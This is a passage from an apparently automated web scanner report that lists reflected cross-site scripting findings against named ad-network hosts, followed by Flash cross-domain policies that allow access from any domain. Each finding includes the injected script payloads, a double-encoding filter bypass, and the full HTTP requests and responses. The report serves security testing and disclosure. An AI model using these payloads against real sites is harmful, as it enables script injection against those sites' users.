Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10116970907_1311108158","http://ad.doubleclick.net/adj/q1.q.boston/be_home;net=q1;u=,q1-10116970907_1311108158,11fda490648f83c7628e';alert(1)//4dbde60b8a6,ent,;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.146. http://a.collective-media.net/cmadj/q1.q.boston/bus [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.q.boston/bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab145'%3balert(1)//cf264ed780e was submitted in the cli cookie. This input was echoed as ab145';alert(1)//cf264ed780e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cmadj/q1.q.boston/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83cab145'%3balert(1)//cf264ed780e; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

4.147. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 816eb<script>alert(1)</script>740fa5f17ad was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311085610127 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==816eb<script>alert(1)</script>740fa5f17ad

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 19 Jul 2011 14:26:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 2615

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==816eb<script>alert(1)</script>740fa5f17ad
userid:
</div>
...[SNIP]...

4.148. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2aa"><script>alert(1)</script>9c3df17f431 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd5994e2aa"><script>alert(1)</script>9c3df17f431; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1928
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:46 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd5994e2aa"><script>alert(1)</script>9c3df17f431&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.149. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26b2"><script>alert(1)</script>0ad41bbfab3 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599c26b2"><script>alert(1)</script>0ad41bbfab3; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1584
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:40 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599c26b2"><script>alert(1)</script>0ad41bbfab3&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.150. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0b1"><script>alert(1)</script>b355aa58d45 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd5998a0b1"><script>alert(1)</script>b355aa58d45; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1582
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd5998a0b1"><script>alert(1)</script>b355aa58d45&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.151. http://www.clickmanage.com/events/clickevent.aspx [u parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clickmanage.com
Path:	/events/clickevent.aspx

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae136%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252726493d2e792 was submitted in the u parameter. This input was echoed as ae136'style='x:expression(alert(1))'26493d2e792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the u request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_softwareae136%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252726493d2e792&gclid=CIGmsIfNjaoCFct95QodzRHo0Q HTTP/1.1
Host: www.clickmanage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:20:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: policyref="http://www.clickmanage.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_softwareae136'style='x:expression(alert(1))'26493d2e792
Set-Cookie: uid=21367747-2c53-4cc6-a391-4d75cc92d57b; expires=Wed, 18-Jul-2012 14:20:32 GMT; path=/
Set-Cookie: cp=10332,634466676322687500,4,1044996461,599266080000000000,0*|; expires=Wed, 18-Jul-2012 14:20:32 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 262

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_softwareae136'style='x:expression(alert(1))'26493d2e792'>
...[SNIP]...

5. Flash cross-domain policy previous next
There are 79 instances of this issue:

http://0.gravatar.com/crossdomain.xml
http://1.gravatar.com/crossdomain.xml
http://a.collective-media.net/crossdomain.xml
http://a.netmng.com/crossdomain.xml
http://a.ok.facebook.com/crossdomain.xml
http://a.tribalfusion.com/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://admeld.adnxs.com/crossdomain.xml
http://ads.as4x.tmcs.ticketmaster.com/crossdomain.xml
http://ads.undertone.com/crossdomain.xml
http://adx.adnxs.com/crossdomain.xml
http://api.brightcove.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://b3.mookie1.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://c.atdmt.com/crossdomain.xml
http://cache.specificmedia.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://creatives.as4x.tmcs.net/crossdomain.xml
http://d.agkn.com/crossdomain.xml
http://dev.virtualearth.net/crossdomain.xml
http://ecn.api.tiles.virtualearth.net/crossdomain.xml
http://ecn.dev.virtualearth.net/crossdomain.xml
http://ecn.t0.tiles.virtualearth.net/crossdomain.xml
http://ecn.t1.tiles.virtualearth.net/crossdomain.xml
http://ecn.t2.tiles.virtualearth.net/crossdomain.xml
http://ecn.t3.tiles.virtualearth.net/crossdomain.xml
http://external.ak.fbcdn.net/crossdomain.xml
http://farecastcom.122.2o7.net/crossdomain.xml
http://files.livedrive.com/crossdomain.xml
http://g-pixel.invitemedia.com/crossdomain.xml
http://img1.catalog.video.msn.com/crossdomain.xml
http://img2.catalog.video.msn.com/crossdomain.xml
http://img3.catalog.video.msn.com/crossdomain.xml
http://img4.catalog.video.msn.com/crossdomain.xml
http://in.getclicky.com/crossdomain.xml
http://log50.doubleverify.com/crossdomain.xml
http://media.fastclick.net/crossdomain.xml
http://metrics.boston.com/crossdomain.xml
http://metrics.ticketmaster.com/crossdomain.xml
http://metrics.versionone.com/crossdomain.xml
http://now.eloqua.com/crossdomain.xml
http://pixel.invitemedia.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://puma.vizu.com/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://s3.amazonaws.com/crossdomain.xml
http://secure.adnxs.com/crossdomain.xml
http://segment-pixel.invitemedia.com/crossdomain.xml
http://statse.webtrendslive.com/crossdomain.xml
http://stubhub.tt.omtrdc.net/crossdomain.xml
http://t.mookie1.com/crossdomain.xml
http://wa.stubhub.com/crossdomain.xml
http://www.clickmanage.com/crossdomain.xml
http://add.my.yahoo.com/crossdomain.xml
http://api.bing.com/crossdomain.xml
http://api.choicestream.com/crossdomain.xml
http://b.myspace.com/crossdomain.xml
http://cdn.stumble-upon.com/crossdomain.xml
http://cgi.ebay.com/crossdomain.xml
http://developers.facebook.com/crossdomain.xml
http://edge.sharethis.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://rover.ebay.com/crossdomain.xml
http://srx.main.ebayrtm.com/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://wd.sharethis.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.myspace.com/crossdomain.xml
http://www.res-x.com/crossdomain.xml
http://www.stumbleupon.com/crossdomain.xml
http://www.ticketmaster.com/crossdomain.xml
http://boston.com/crossdomain.xml
http://cache.boston.com/crossdomain.xml
http://rmedia.boston.com/crossdomain.xml
http://www.boston.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://0.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://0.gravatar.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://1.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1.gravatar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

5.3. http://a.collective-media.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 08 Sep 2010 13:14:23 GMT
Accept-Ranges: bytes
Date: Tue, 19 Jul 2011 20:42:35 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

5.4. http://a.netmng.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:07 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT
ETag: "18273e-6a-4974ab3a2af00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://a.ok.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.ok.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.ok.facebook.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:57:50 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.6. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 19 Jul 2011 14:58:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.8. http://admeld.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admeld.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:43:04 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:43:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.9. http://ads.as4x.tmcs.ticketmaster.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.as4x.tmcs.ticketmaster.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
Last-Modified: Tue, 17 Nov 2009 02:41:10 GMT
ETag: "23ca27-138-478880f095d80"
Accept-Ranges: bytes
Content-Length: 312
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

5.10. http://ads.undertone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 Jul 2011 22:26:02 GMT
ETag: "53000b-fc-4a7e6c8eaf280"
Content-Type: text/xml
Date: Tue, 19 Jul 2011 20:42:55 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.11. http://adx.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:26:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:11 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.12. http://api.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
